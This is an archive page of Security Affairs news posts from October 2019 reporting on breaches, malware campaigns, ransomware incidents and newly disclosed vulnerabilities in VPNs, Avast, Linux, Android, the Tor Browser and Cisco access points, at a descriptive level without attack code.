Category Archives: Security Affairs

NordVPN, TorGuard, and VikingVPN VPN providers disclose security breaches

NordVPN and TorGuard VPN firms were hacked, threat actors leaked the private keys used to secure their web servers and VPN configuration files. 

Hackers have breached the systems used by NordVPN and TorGuard VPN companies and leaked the private keys used to secure their web servers and VPN configuration files. 

The information belonging to the NordVPN company that was leaked online were stolen from the server of the VPN provider last year.

The attackers leaked at least three private keys that belong to the company, one from an older NordVPN site certificate and two OpenVPN keys.

The certificate is expired in October 2018, a circumstance that suggests that the hack happened last year, but we cannot exclude that the server was storing the key of an outdated certificate.

After the keys were leaked online, experts pointed out that attackers could set up rogue VPN servers and use them yo carry out MiTM attack on the users’ traffic.

Experts at Golem.de remarked that the expired certificate could be used only to carry out a MiTM attack, but it could not have been used to decrypt the traffic.

“You can not decrypt stored VPN traffic directly with the leaked keys. From the configuration files also shown, it shows that the OpenVPN configuration uses a key exchange with Diffie-Hellman, so that the connections have the so-called forward-secrecy property, which prevents subsequent decryption.” reads the post published by golem.de. “The keys could be used for a man-in-the-middle attack. In addition, it can be assumed that the attacker was able to access traffic during the hack.”

nordvpn hacked

NordVPN confirmed the incident that took place in March 2018 when hackers accessed one of the datacenters in Finland operated by a third-party provider.

“A few months ago, we became aware that, on March 2018, one of the datacenters in Finland we had been renting our servers from was accessed with no authorization.” reads the statement published by the VPN provider. “The attacker gained access to the server by exploiting an insecure remote management system left by the datacenter provider. We were unaware that such a system existed. The server itself did not contain any user activity logs; none of our applications send user-created credentials for authentication, so usernames and passwords couldn’t have been intercepted either.”

The company highlighted that the expired TLS key was stored in the breached datacenter in Finland, it couldn’t possibly have been used to decrypt the VPN traffic of any other server. The only possible way to abuse website traffic was by performing a personalized and sophisticated MiTM attack to intercept a single connection that tried to access nordvpn.com. ù

After the incident, NordVPN immediately launched an investigation and terminated the contract with the server provider.

The incident also impacted other VPN providers using the same data center, such as VikingVPN and TorGuard.

TorGuard was the only VPN provider of the three impacted by the incident to be implementing secure PKI management this means that its main CA key was not on the affected VPN server.

“The single TorGuard server that was compromised was removed from our network in early 2018 and we have since terminated all business with the related hosting reseller because of repeated suspicious activity.” reads a statement published by TorGuard.

“TorGuard VPN or proxy traffic was not compromised during this isolated breach of a single VPN server and no sensitive information was compromised during this incident. Even though no security risk past or present was found, TorGuard has reissued all certs earlier this year per our security protocol,”

Pierluigi Paganini

(SecurityAffairs – VPN, hacking)

The post NordVPN, TorGuard, and VikingVPN VPN providers disclose security breaches appeared first on Security Affairs.

Czech Police and Intelligence agency dismantled Russian Spy ring on its soil

Czech police and intelligence services have identified a Russian espionage network operating having a nerve center in its Prague embassy.

Czech police and intelligence services have dismantled a Russian espionage network operating that was operating via its Prague embassy.

The officials were helped by peers at the National Organised Crime Centre (NCOZ).

According to the official, the cyberspies were setting up a structure to hit targets in Czech and abroad.

Michal Koudelka, head of the Czech Republic’s BIS intelligence service, confirmed that the authorities busted the cyber espionage ring that is allegedly part of a larger organization set up by Russia and operating in other European countries.

“The network was completely destroyed and decimated,” Michal Koudelka, said in parliament, quoted by the Czech CTK news agency.

“It was created by people with links to Russian intelligence services and financed from Russia and the Russian embassy,”

In August, a parliamentary committee in the Czech Republic revealed that the National Cyber and Information Security Agency blamed a foreign state for a cyber attack that targeted the Czech Foreign Ministry.

The committee did not reveal the name of the state allegedly involved in the attack. Daily N, the Czech independent daily, has accused Russia multiple times for the attacks against the foreign ministry which took place in June.

According to a report published in September by the NUKIB Czech Intelligence agency, China carried out a major cyber attack on a key government institution in the Czech Republic last year.

The report issued by the NUKIB agency states that the attack “was almost certainly carried out by a state actor or a related group,” and “a Chinese actor” is the main suspect.

Pierluigi Paganini

(SecurityAffairs – Russia, Czech police)

The post Czech Police and Intelligence agency dismantled Russian Spy ring on its soil appeared first on Security Affairs.

Avast internal network breached for the second time by sophisticated hackers

The popular security firm Avast disclosed today a security breach that impacted its internal network accessed via a compromised VPN profile.

The security firm Avast disclosed today a security breach that impacted its internal network, according to a statement published by the company, the intent of the hackers was to carry out a supply chain attack.

It seems that attackers attempted to inject malicious code in the CCleaner, an attack scenario similar to the one that impacted the company in 2017.

The attack was spotted on September 23, when the Avast experts noticed suspicious behavior on the internal network. The successive investigation involved the Czech intelligence agency, Security Information Service (BIS), the local Czech police force cybersecurity division, and an external forensics team.

The hackers compromised a VPN account to access the internal network of the company. The account did not have domain admin privileges, but hackers successfully got privilege escalation.

Avast pointed out that hackers used compromised credentials through a temporary VPN profile that did not require 2FA.

“The user, whose credentials were apparently compromised and associated with the IP, did not have domain admin privileges. However, through a successful privilege escalation, the actor managed to obtain domain admin privileges. The connection was made from a public IP hosted out of the UK and we determined the attacker also used other endpoints through the same VPN provider.” reads the statement published by Avast.

The analysis of the external IPs used by the attackers revealed that the threat actors had been attempting to gain access to the network through the VPN as early as May 14.

In an attempt to track the attackers, Avast did not close the temporary VPN profile and monitored any access to the internal network until October 15,

“Even though we believed that CCleaner was the likely target of a supply chain attack, as was the case in a 2017 CCleaner breach, we cast a wider net in our remediation actions.” continues the statement.

Avast adopted the following measured to mitigate the incident:

  • On September 25, Avast halted upcoming CCleaner releases and began checking prior CCleaner releases.
  • The company re-signed a clean update of the product and pushed it out to users via an automatic update on October 15.
  • The company revoked the previous certificate.

At the time of writing, it is not possible to determine if this attack was linked to the one that occurred in 2017.

“Having taken all these precautions, we are confident to say that our CCleaner users are protected and unaffected,” concludes the statement.

“From the insights we have gathered so far, it is clear that this was an extremely sophisticated attempt against us that had the intention to leave no traces of the intruder or their purpose, and that the actor was progressing with exceptional caution in order to not be detected. We do not know if this was the same actor as before and it is likely we will never know for sure, so we have named this attempt ‘Abiss’.”

The company, along with law enforcement, is still investigating the incident.

Pierluigi Paganini

(SecurityAffairs – Avast, hacking)

The post Avast internal network breached for the second time by sophisticated hackers appeared first on Security Affairs.

TA505 cybercrime group use SDBbot RAT in recent campaigns

TA505 cybercrime group that operated the Dridex Trojan and Locky ransomware, has been using a new RAT dubbed SDBbot in recent attacks.

Security experts at Proofpoint observed the notorious TA505 cybercrime group that has been using a new RAT dubbed SDBbot in recent attacks.

The TA505 group, that is known to have operated both the Dridex and Locky malware families, continues to make small changes to its operations. TA505 hacking group has been active since 2014 focusing on Retail and banking sectors.

SDBbot is a backdoor that is delivered via a new downloader dubbed Get2 that was written in C++. The dropper was also used to distribute other payloads, including FlawedGrace, FlawedAmmyy, and Snatch.

The new downloader Get2 was first observed in early September when the groups used it in targeted attacks against financial institutions in Greece, Singapore, United Arab Emirates, Georgia, Sweden, Lithuania, and a few other countries.

On September 20, new phishing attacks involved thousands of emails, with English and French lures, attempting to deliver Microsoft Excel and .ISO attachments to targets in the United States and Canada.

The TA505 group started delivering SDBbot in early October, it used weaponized Microsoft Office documents leveraging the Get2 downloader.

“On October 7, instead of directly attached malicious Microsoft Excel files, Proofpoint researchers observed thousands of emails containing URL shortener links redirecting to a landing page that in turn links to an Excel sheet “request[.]xls”. This campaign only used the English language and targeted companies from various industries primarily in the United States.” reads the analysis published by Proofpoint.

SDBbot RAT

SDBbot is a new remote access Trojan (RAT) written in C++ that has been delivered by the Get2 downloader in recent TA505 campaigns. Its name is derived from the debugging log file (sdb.log.txt) and DLL name (BotDLL[.]dll) used in the initial analyzed sample. It also makes use of application shimming [1] for persistence.

The attackers switched from attachments to shortened URLs that point to a malicious Excel sheet, the attacks mainly targeted organizations in the United States.

Experts discovered that the Get2 downloader also implements information-gathering capabilities. It collects basic system information and sends it back to an hardcoded C&C via an HTTP POST request.

The SDBbot RAT has three main components, an installer, a loader, and a backdoor component.

The installer is used to store the RAT in the registry and establish persistence for the loader, while if the bot is running with admin privileges on a Windows version newer than Windows 7, persistence is established using the registry “image file execution options” method. If the bot is running as admin on Windows XP or 7, persistence is established using application shimming

“All three of the persistence mechanisms require a reboot to take effect and there is no additional code to continue executing the loader and RAT components from the installer. Proofpoint researchers speculate that the reboot functionality in the Get2 downloader (described above) is used to continue SDBbot’s execution after installation in the TA505 campaigns.” continues the analysis.

The loader is used to execute the loader shellcode from the binary blob that is stored in the registry that decompresses the RAT and loads and executes a DLL.

The RAT component supports typical RAT functionalities, including command shell, video recording of the screen, remote desktop, port forwarding, and file system access.

“The new Get2 downloader, when combined with the SDBbot as its payload appears to be TA505’s latest trick (or treat) for the Fall of 2019,” Proofpoint concludes.

Pierluigi Paganini

(SecurityAffairs – SDBbot RAT, TA505)

The post TA505 cybercrime group use SDBbot RAT in recent campaigns appeared first on Security Affairs.

US Army stopped using floppy disks as storage for SACCS system that manages nuclear weapons arsenal

The news is quite curious, the US military will no longer use 8-inch floppy disks in an antiquated computer (SACCS) to manage nuclear weapons arsenal.

It’s official, the US strategic command has announced that it has replaced the 8-inch floppy disks in an ancient computer to receive nuclear launch orders from the President with a “highly-secure solid state digital storage solution.”

The use of the 8-inch floppy disks was revealed back in 2014 by the CBS “60 Minutes” TV show.

“At long last, that system, the Strategic Automated Command and Control System or SACCS, has dumped the floppy disk, moving to a “highly-secure solid state digital storage solution” this past June, said Lt. Col. Jason Rossi, commander of the Air Force’s 595th Strategic Communications Squadron.” reported c4isrnet.com.

The Strategic Automated Command and Control System (SACCS) is used by US nuclear forces to send orders from command centers to field forces in case of crisis. It is considered totally secure because it is completely isolated from the internet, even if researchers worldwide have demonstrated that there are many ways to breach into an air-gapped network.

The Strategic Automated Command and Control System (SACCS) is a United States Strategic Command command and control system to coordinate the operational functions of United States nuclear forces (ICBMs, nuclear bombers, and SLBMs).

“You can’t hack something that doesn’t have an IP address. It’s a very unique system — it is old and it is very good,” Rossi added.

In June, the US Air Force has replaced the floppy disks in the SACCS nuclear weapons management system with a “highly-secure solid state digital storage solution.”

The system has been operating since 1968 running on an IBM Series/1 mainframe and using 8-inch floppy disks as storage support.

The use of 8-inch floppy disks was also confirmed by a report published by the US Government Accountability Office (GAO).

“Coordinates the operational functions of the United States’ nuclear forces, such as intercontinental ballistic missiles, nuclear bombers, and tanker support aircrafts. This system runs on an IBM Series/1 Computer—a 1970s computing system— and uses 8-inch floppy disks.” states the report.

“The agency plans to update its data storage solutions, port expansion processors, portable terminals, and desktop terminals by the end of fiscal year 2017.”

One of the military working for Lt. Col. Rossi, Robert Norman, a civilian Air Force employee with more than four years of experience fixing the electronics on SACCS, explained that every issue on the ancient system request a dedicated maintenance e often the damaged components are repaired by experts like him.

“Any electronic repair is going to take a lot of work. I shouldn’t say it’s difficult, [but] unfortunately a lot of the newer electronics are plug and play,” he said, explaining that when electronic components like motherboards or microchips break on newer systems, the common practice is to throw out them out and replace them.” Norman told c4isrnet.com. “On SACCS, all of those pieces are repaired — which for maintainers could mean spending hours spent under a microscope, slowly but deliberately replacing a copper wire laced throughout a circuit board, for example. The challenges get a little larger when we’re actually repairing them down to component level,”

Experts pointed out that even if the hardware used by the SACC antiquate, its software is constantly refreshed by young Air Force programmers.

The problem of security for critical defense systems was approached by the US Government several times, According to a report published by the Government Accountability Office (GAO) in October 2018, almost any new weapon systems in the arsenal of the Pentagon is vulnerable to hacking.

According to the 50-page report published by the GAO, several vulnerabilities in the weapon systems were never fixed.

Pierluigi Paganini

(SecurityAffairs – SACCS, hacking)

The post US Army stopped using floppy disks as storage for SACCS system that manages nuclear weapons arsenal appeared first on Security Affairs.

Security Affairs 2019-10-19 23:46:08

Threat actors leverage malicious plugins that hide in plain sight to backdoor WordPress websites and to use them for brute-forcing other sites.

The use of fake WordPress plugins installed by hackers is not a novelty, recently at Sucuri observed multiple infections aimed at installing fake plugins with backdoor capabilities.

Attackers use automated tools to create malicious WordPress plugins or by and include in their code malicious payloads such as web shells.

The researchers spotted some fake plugins with backdoor functionality, two of them named initiatorseo or updrat123 were based on the structure of the popular backup/restore WordPress plugin UpdraftPlus.

The UpdraftPlus WordPress plugin has more than 2 million active installations and its contributors regularly update it.

“While their code differs in terms of variable names, the malicious plugins do share a few things in common: they possess a similar structure along with header comments from the popular backup/restore plugin UpdraftPlus.” reads the post published by Sucuri.

“The metadata comments within these fake plugins include copies from version 1.16.16 of UpdraftPlus, which was released on July 23rd, 2019,” found researchers at web security and protection company Sucuri”

The malicious WordPress plugins hide in the WordPress dashboard and are visible only by anyone who use browsers with specific User-Agent strings that vary from plugin to plugin

The attacker could verify the presence of the malicious plugin using a GET request with custom parameters such as initiationactivity or testingkey.

The fake WordPress plugins allow attackers to establish a backdoor on the compromised sites and to provide them with access to the servers even after the original infection vector was removed.

The backdoors are used to upload arbitrary files for malicious purposes to the compromised servers using POST requests.

“Malicious requests come in the form of POST parameters, which specify a remote URL for the file download locations, along with the path and name of the file to be created on the compromised server.” continues the post.

“So far, the names of these POST parameters have been unique for each plugin that we’ve analyzed.”

Post requests contain parameters such as the URL where are located the payloads to download, or the path where the files should be written on the compromised servers.

Sucuri researchers also observed attackers using fake plugins to upload files with random names (i.e. 5d9196744f88d5d9196744f893.php) to site root directories. These files contain a script that threat actors use to carry out brute force attacks on other sites.

“Hackers want to maintain access to websites as long as they can. To accomplish this, they upload various backdoors into random files scattered across the whole site. Sometimes backdoors come in the form of WordPress plugins that might not even be visible from the admin interface.” concludes Sucuri.

“Additionally, compromised websites may be used for malicious activity that is completely invisible from outside, including DDoS and brute-force attacks, mailing tons of spam, or cryptomining.

Pierluigi Paganini

(SecurityAffairs – WordPress plugins, backdoor)

The post appeared first on Security Affairs.

A critical Linux Wi-Fi bug could be exploited to fully compromise systems

A researcher discovered a critical Linux vulnerability, tracked as CVE-2019-17666, that could be exploited to fully compromise vulnerable machines.

Nico Waisman, principal security engineer at Github, discovered a critical Linux flaw, tracked as CVE-2019-17666, that could be exploited by attackers to fully compromise vulnerable machines.

The vulnerability affects Linux versions through 5.3.6, according to the researchers the issue exists at least since 2015.

The vulnerability is a heap buffer overflow issue that resides in the “rtlwifi” driver that allows certain Realtek Wi-Fi modules to communicate with the Linux operating system.

“rtl_p2p_noa_ie in drivers/net/wireless/realtek/rtlwifi/ps.c in the Linux kernel through 5.3.6 lacks a certain upper-bound check, leading to a buffer overflow.” reads the description published by NVD.

The issue affects a feature called the Notice of Absence protocol implemented in the “rtlwifi” driver. The protocol is used by devices to autonomously power down their radio and save energy.

“The Notice of Absence (NoA) protocol allows a P2P GO to announce time intervals, referred to as absence periods, where P2P Clients are not allowed to access the channel, regardless of whether they are in power save or in active mode. In this way, a P2P GO can autonomously decide to power down its radio to save energy.” reads a paper on Device to device communications.

The expert noticed that the driver fails to correctly handle Notice of Absence packets.

“Nicolas Waisman noticed that even though noa_len is checked for a compatible length it’s still possible to overrun the buffers of p2pinfo since there’s no check on the upper bound of noa_num. Bound noa_num against P2P_MAX_NOA_NUM.” reads the security advisory.

An attacker could use packets with incorrect length to trigger the flaw and cause the system to crash.

An unauthenticated attacker could trigger the flaw only if he is within the radio range of the target device.

“The vulnerability triggers an overflow, which means it could make Linux crash or if a proper exploit is written (which is not trivial), an attacker could obtain remote code-execution,” Waisman explained to the Threatpost.

The Linux kernel team has already developed a fix that is currently under revision, it has not yet been included into the Linux kernel.

Pierluigi Paganini

(SecurityAffairs – Linux Kernel, hacking)

The post A critical Linux Wi-Fi bug could be exploited to fully compromise systems appeared first on Security Affairs.

Hundreds of millions of UC Browser Android Users Exposed to MiTM Attacks. Again.

Over 600 million UC Browser and UC Browser Mini Android users have been exposed to man-in-the-middle (MiTM) attacks.

More than 600 million users of the popular UC Browser and UC Browser Mini Android apps have been exposed to man-in-the-middle (MiTM) attacks by downloading an Android Package Kit (APK) from a third party server over unprotected channels.

The UC Browser is developed by UCWeb, a company owned by the Alibaba Group since 2014, and is the world’s fourth most popular mobile browser according to StatCounter.

Researchers at Zscaler were investigating an unusual activity when discovered some questionable connections to a specific domain, 9appsdownloading.. The requests were being made by the popular Browser app. 

Further investigation allowed the researchers to determine that the UC Browser app was attempting to download an additional Android Package Kit (APK) over an unsecured channel (HTTP over HTTPS). This practice violates the Google Play policy, and the use of an unsecured channel exposes the users to man-in-the-middle attacks. The use of unsecured channels could allow attackers to deliver and install an arbitrary payload on a target device to perform a broad range of malicious activities.

The analysis of the APK revealed that it was available on a third-party app store named 9Apps, with the com.mobile.indiapp package name.

Once installed on a device, the 9Apps app started scanning for installed applications and it allowed installing more apps from the third-party app store that were downloaded as APKs from the 9appsdownloading[.]com domain.

UC browser

Researchers also pointed out that dropping an APK on external storage (/storage/emulated/0) could allow other apps, with appropriate permissions, to tamper with the APK.

Zscaler shared its findings to Google on August 13 and the discussion on the potential violation lasted until September 25.

On September 27 Google acknowledged the problems and reported them to UCWeb asking the development team to “update the apps and remediate the policy violation,” UCWeb addressed the issues in its apps.

“It is too early to determine exactly what the Browser developers intended with their third-party APK, but it is clear that they are putting users at risk. And with more than 500 million downloads of UC Browser, that is a significant threat.” concludes the analysis published by ZScaler.

“Because UC Browser downloads an unknown third-party app to devices over unsecured channels, those devices can become victim to man-in-the-middle (MiTM) attacks. Using MiTM, attackers can spy on the device and intercept or change its communications,”

In May, security researcher Arif Khan discovered a browser address bar spoofing flaw in the popular browser apps for Android.

Pierluigi Paganini

(SecurityAffairs – Android, hacking)

The post Hundreds of millions of UC Browser Android Users Exposed to MiTM Attacks. Again. appeared first on Security Affairs.

Emsisoft released a free decryption tool for the STOP (Djvu) ransomware

Emsisoft firm has released a new free decryption tool the STOP (Djvu) ransomware, in the last months the research team helped victims of many other threats.

STOP (Djvu) ransomware has 160 variants that infected more hundreds of thousands of victims worldwide. Experts estimated a total number of 460,000 victims, that makes this threat the most active and widespread ransomware today.

According to data included in Emsisoft Ransomware Statistics report for Q2 and Q3 2019, Djvu ransomware accounts for more than half of all the ransomware submissions throughout the world.

For the first time, a decryptor used a side-channel attack on the ransomware’s keystream.

“We’ll be breaking STOP’s encryption via a side-channel attack on the ransomware’s keystream. As far as we know, it’s the first time this method has been used to recover ransomware-encrypted files on such a large scale.” reads the post published by Emsisoft.

The Divu ransomware encrypts victim’s files with Salsa20, and appends one of dozens of extensions to filenames, such as “.djvu”, “.rumba”, “.radman”, “.gero”, etc.

The price of the private key and decrypt software is $980, victims can receive a 50% discount if they contact the crooks in the first 72 hours.

The Djvu ransomware is mainly delivered through key generators and cracks, experts pointed out that some versions of STOP also bundle additional malicious payloads, including password-stealers.

The decryptor released by Emsisoft can recover for free files encrypted by 148 of the 160 variants, this means that approximately 70% of victims will be able to recover their data. Unfortunately, currently it is not possible to decrypt files encrypted by the remaining 12 variants.

Below key findings shared by the company:

  • The tool will recover files encrypted by 148 of the 160 known STOP variants and will enable approximately 70% of victims to recover their data without paying the ransom.
  • STOP has claimed more victims than any other currently active ransomware: 116k confirmed and 460K estimated.
  • The encryption is being broken via a side-channel attack on the keystream. This will be the first time ransomware has been decrypted this way on such a large scale (as far as we know). 
  • Because of the number of victims, we will not be able to provide one-on-one help for those who need assistance using the tool. The volunteer community at Bleeping Computer has, however, agreed to act as an unofficial support channel for this tool and will be providing help to those who need it. We greatly appreciate their efforts and willingness to help. Some words from Bleeping Computer’s Lawrence Abrams are below. 

Download the STOP Djvu Decryptor here

Pierluigi Paganini

(SecurityAffairs – Djvu ransomware, malware)

The post Emsisoft released a free decryption tool for the STOP (Djvu) ransomware appeared first on Security Affairs.

Systems at Ingredients provider Ingredion infected with a Malware

The US ingredient provider Ingredion Incorporated announced that it has recently detected suspicious activity associated with a malware attack.

The US ingredient provider Ingredion Incorporated revealed to have detected an ongoing malware attack after its experts noticed a suspicious activity this week. Ingredion has hired third-party experts to help its staff in investigating the incident and restoring the affected systems.

At the time of writing, the company did not provide details about the attack, Ingredion only said that there is no evidence that hackers accessed to customer, supplier or employee data.

“The company warns that it has called in external experts to assist with restoring affected servers, and there may be some delays in transactions with customers and suppliers.” reported SecurityWeek.

“The ingredient solutions provider admitted that it “will take time” to restore some of the impacted systems.”

Ingredion

Experts believe that the company was infected with a piece of ransomware.

Recently the global shipping and mailing services company Pitney Bowes suffered a security incident, today the company published an update on the attack and confirmed that the root cause of the disruptions of its services was “the Ryuk virus malware attack.”

Pierluigi Paganini

(SecurityAffairs – Ingredion, malware)

The post Systems at Ingredients provider Ingredion infected with a Malware appeared first on Security Affairs.

Trojanized Tor Browser targets shoppers of Darknet black marketplaces

A tainted version of the Tor Browser is targeting dark web market shoppers to steal their cryptocurrency and gather information on their browsing activity.

A Trojanized version of the Tor Browser is targeting shoppers of black marketplaces in the dark web, threat actors aim to steal their cryptocurrency and gather information on their browsing activity.

At the time of writing, attackers have already stolen about $40,000 worth of Bitcoin through more than 860 transactions registered to three of the attackers’ wallets.

“Utilizing a trojanized version of an official Tor Browser package, the cybercriminals behind this campaign have been very successful – so far their pastebin.com accounts have had more than 500,000 views and they were able to steal US$40,000+ in bitcoins.” reads a post published by ESET.

The weaponized version of the Tor Browser is promoted on Pastebin as the Russian version of the popular software. The Pastebin posts advertise the version saying that it also includes an anti-captcha feature that allows users to speed-up the browsing activity.

The trojanized Tor browser variant is hosted on the following two domains created in 2014 that are designed to appear as the official Russian version of the software:

  • tor-browser[.]org
  • torproect[.]org (the URL is missing “j”)

Threat actors also optimized the posts promoting the malicious software to appear as top results for queries for drugs, censorship bypass, and Russian politicians.

Between 2017 and early 2018, crooks promoted the webpages of the trojanized Tor Browser using spam messages on multiple Russian forums.

The home page of both sites displays a warning to the visitors informing them that they have an outdated Tor Browser, even if the visitors are using the most up-to-date Tor Browser version.

Trojanized Tor browser

“Your anonymity is in danger! WARNING: Your Tor Browser is outdated. Click the button “Update” reads the English translations.

When the users click on the “Update Tor Browser” button, they are redirected to a second website that delivers a Windows installer.

“This trojanized Tor Browser is a fully functional application. In fact, it is based on Tor Browser 7.5, which was released in January 2018. Thus, non-technically-savvy people probably won’t notice any difference between the original version and the trojanized one.” continues the analysis.

“No changes were made to source code of the Tor Browser; all Windows binaries are exactly the same as in the original version. However, these criminals changed the default browser settings and some of the extensions.”

The Trojanized Tor Browser has disabled the update feature to prevent victims from updating to a non-tainted version, attackers also changed the default User-Agent to the unique hardcoded value that is used by threat actors as a fingerprint.

“The most important change is to the xpinstall.signatures.required settings, which disable a digital signature check for installed Tor Browser add-ons.” reads the post. “Therefore, the attackers can modify any add-on and it will be loaded by the browser without any complaint about it failing its digital signature check.”

Crooks also modified the HTTPS Everywhere add-on included with the browser to add a content script (script.js) that will be executed on load in the context of every webpage.

The JavaScript payload uses a standard webinject mechanism that allows stealing content in forms, hiding original content, showing fake messages, or adding its own content.

The only JavaScript payload observed by ESET was used to target visitors of three of the largest Russian-speaking darknet markets. This script attempts to alter QIWI (a popular Russian money transfer service) or bitcoin wallets located on pages of these markets.

Using this trick, attackers are able to hijack payments by changing the wallet address of the shoppers with the ones belonging to the attackers.

“As of this writing, the total amount of received funds for all three wallets is 4.8 bitcoin, which corresponds to over US$40,000. It should be noted that the real amount of stolen money is higher because the trojanized Tor Browser also alters QIWI wallets.” concludes ESET that also shared IoCs. “This trojanized Tor Browser is a non-typical form of malware, designed to steal digital currency from visitors to darknet markets. Criminals didn’t modify binary components of the Tor Browser; instead, they introduced changes to settings and the HTTPS Everywhere extension. This has allowed them to steal digital money, unnoticed, for years.”

Pierluigi Paganini

(SecurityAffairs – Trojanized Tor Browser, hacking)

The post Trojanized Tor Browser targets shoppers of Darknet black marketplaces appeared first on Security Affairs.

Pitney Bowes revealed that its systems were infected with Ryuk Ransomware

The global shipping and mailing services company Pitney Bowes revealed that the recent partial outage was caused by the Ryuk ransomware.

The global shipping and mailing services company Pitney Bowes recently suffered a partial outage of its service caused by a ransomware attack. Pitney Bowes is a global technology company that provides commerce solutions in the areas of ecommerce, shipping, mailing, data and financial services.

The company now published an update on the attack, it confirmed that the root cause of the disruptions of its services was “the Ryuk virus malware attack.”

“This is an update to the status of Pitney Bowes recovery from the Ryuk virus malware attack on some of our systems that disrupted client access to some of our services.” reads the update shared by the company. “Upon discovery of the attack, with the support of third-party advisors, we immediately began working on a plan and thorough process of systems restoration with the goal of restoring service as quickly as possible. We have also been reaching out to our clients, partners, and employees.”

The mailing system products were paralyzed by the attack, the company confirmed that immediately after the attack the following systems were NOT working:

  • Clients are unable to refill postage or upload transactions on their mailing machine
  • SendPro Online in the UK and Canada
  • Hosted instances of SendSuite Live, SendSuite Express, SendSuite Tracking (SST)
  • Accounting solutions such as Inview, Business Manager and Account List Management
  • Your Account and the Pitney Bowes Supplies web store cannot be accessed. This in turn impacts clients subscribed to AutoInk and our Supplies App

The company announced that currently it has restored many of the impacted systems.

The Ryuk ransomware was involved in a long string of attacks targeting cities, hospitals, and organizations worldwide.

In September New Bedford city was infected with Ryuk ransomware, but did not pay $5.3M ransom. In April, systems at Stuart City were infected by the same Ryuk ransomware, in early March, Jackson County, Georgia, was hit by the same ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

Pierluigi Paganini

(SecurityAffairs – Ryuk Ransomware, Pitney Bowes)

The post Pitney Bowes revealed that its systems were infected with Ryuk Ransomware appeared first on Security Affairs.

Researcher released PoC exploit code for CVE-2019-2215 Android zero-day flaw

A researcher has published a proof-of-concept (PoC) exploit code for the CVE-2019-2215 zero-day flaw in Android recently addressed by Google

Earlier October, Google Project Zero researchers Maddie Stone publicly disclosed a zero-day vulnerability, tracked as CVE-2019-2215, in Android.

According to the expert, the bug was allegedly being used or sold by the controversial surveillance firm NSO Group.

Maddie Stone published technical details and a proof-of-concept exploit for the high-severity security vulnerability, seven days after she reported it to the colleagues of the Android security team.

The flaw is a use-after-free vulnerability that affects the Android kernel’s binder driver, it could be exploited by a local privileged attacker or a malicious app to escalate privileges to gain root access to a vulnerable device. Experts warn it could potentially allow to fully compromise the device.

The flaw affects versions of Android kernel released before April last year. This vulnerability was addressed in Dec 2017 in the 4.14 LTS kernel [1], AOSP android 3.18 kernel [2], AOSP android 4.4 kernel [3], and AOSP android 4.9 kernel [4]. The expert pointed out that Pixel 2 with most recent security bulletin is still vulnerable based on source code review.

This means that most of the Android devices available on the market with the unpatched kernel are still vulnerable to this vulnerability, even is the owners have installed the latest Android security updates.

Some of the devices which appear to be vulnerable based on source code review are:

1) Pixel 2 with Android 9 and Android 10 preview (https://android.googlesource.com/kernel/msm/+/refs/heads/android-msm-wahoo-4.4-q-preview-6/)
2) Huawei P20
3) Xiaomi Redmi 5A
4) Xiaomi Redmi Note 5
5) Xiaomi A1
6) A3
7) Moto Z3
8) Oreo LG phones (run according to )
9) Samsung S7, S8, S9

Maddie Stone explained that the flaw is accessible from inside the Chrome sandbox, the issue is exploitable in Chrome’s renderer processes under Android’s ‘isolated_app’ SELinux domain. This means that a remote attacker could potentially exploit the flaw by chaining it with a Chrome rendering issue

Last week, Google released security patches for Android, the tech giant announced that patches to address the CVE-2019-2215 in Pixel 1 and Pixel 2 devices will be included in the October update.

Now the researchers Grant Hernandez, a PhD candidate at the Florida Institute of Cyber Security at the University of Florida, has publicly disclosed a PoC exploit code for the CVE-2019-2215 vulnerability.

“All I needed to do was compile the exploit and run it over ADB. I downloaded the latest Android NDK and compiled the proof of concept. I ran it on my device and confirmed that I was able to reproduce Maddie Stone’s screenshot exactly.” reads a blog post published by Hernandez.

“The base PoC left us with a full kernel read/write primitive, essentially game over for the systems’ security, but left achieving root as an exercise for the reader,”

The expert explained that an attacker that aims to get a full root shell would need to bypass multiple layers of security defense implemented by Google, including Discretionary Access Control (DAC), Mandatory Access Control (MAC), Linux Capabilities (CAP), SECCOMP, Android Middleware.

Hernandez pointed out that an app accessible kernel exploit allows the attacker to easily bypass or disable all of these layers of defenses.

The expert detailed how to bypass DAC and CAP and how to disable SELinux and SECCOMP. The expert created a one-click rooting application called Qu1ckR00t.

“Once I had a reliable working exploit that I could use over ADB, I decided it would be neat to see the exploit working from an application context. I created Qu1ckR00t (the name is satire) as a one-click rooting application that also YOLO-installs™ Magisk.” concludes the researchers that published the PoC exploit code on GitHub. “There is nothing novel about Qu1ckR00t, but it is cool to get a little taste of a typical iOS jailbreaking flow on Android. Maybe in the future if OEMs like Samsung completely remove OEM Unlock, this kind of rooting method will return to popularity.”

Pierluigi Paganini

(SecurityAffairs – CVE-2019-2215, zero-day)

The post Researcher released PoC exploit code for CVE-2019-2215 Android zero-day flaw appeared first on Security Affairs.

Critical and high-severity flaws addressed in Cisco Aironet APs

A critical flaw in Aironet access points (APs) can be exploited by a remote attacker to gain unauthorized access to vulnerable devices.

Cisco disclosed a critical vulnerability in Aironet access points (APs), tracked as CVE-2019-15260, that can be exploited by a remote, unauthenticated attacker to gain unauthorized access to vulnerable devices with elevated privileges. This vulnerability was discovered during the resolution of a Cisco TAC support case.

Cisco has already released software updates that address the flaw, the company pointed out that there are no workarounds that fix this vulnerability.

The flaw is caused by insufficient access control for some URLs, an attacker could exploit the flaw by simply requesting the unprotected URLs.

“The vulnerability is due to insufficient access control for certain URLs on an affected device. An attacker could exploit this vulnerability by requesting specific URLs from an affected AP. An exploit could allow the attacker to gain access to the device with elevated privileges.” reads the security advisory published by Cisco.

The vulnerability affects Aironet 1540, 1560, 1800, 2800, 3800 and 4800 series APs. Cisco released versions 8.5.151.0, 8.8.125.0 and 8.9.111.0 to address the vulnerability.

Cisco revealed that there is no evidence of attacks exploiting the flaw in the wild.

Aironet APs are also affected by two high-severity flaws that can be exploited by an unauthenticated attacker to trigger a denial-of-service (DoS) condition.

The first flaw, tracked as CVE-2019-15261, impacts the Point-to-Point Tunneling Protocol (PPTP) VPN packet processing functionality.

